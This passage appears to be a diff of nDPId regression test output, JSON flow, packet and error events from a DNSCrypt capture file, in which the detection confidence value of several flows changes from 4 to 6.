+00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":549,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400460} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":549,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAABQPTcAuX4RBDsKAAABucF\/9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":550,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400460} 
@@ -1116,26 +1116,26 @@ 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":946739400522,"pkt":"ZmZmZmZmRERERERECABFAADQoaxAADYRp\/65wX\/0CgAAAQG7u2MAvNXc\/IqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANT+QyCeqOpvY3ek9vOTVGrWy3oc27D9SS491oCJRe7RQWKb3q0aPb33Ziq0RP9PPCzRMBy1lW3l6rz74jWgmwszJtIbCS+4i64Fme9c0vB4hxz+sKp41i8d9KRbhVFMbjMm0hsJL7iLAAAAAV9TV8BfVKlA"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAIcaQhAAH4RLuEKAAABTUJU6cGgAbsCCGUBsp4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAIcaQlAAH4RLuAKAAABTUJU6bQ8AbsCCGUBspoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQogAH4RSx8KAAABTUJU6Z0RAbsGBIoKspkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739400522,"pkt":"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"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":560,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400522} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":560,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQoAuX4Rb\/IKAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQwgAH4RSx0KAAABTUJU6cZFAbsGBGDUspsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":562,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400522} 
00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":562,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQwAuX4Rb\/AKAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQ0gAH4RSxwKAAABTUJU6d8VAbsGBEgCsp0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA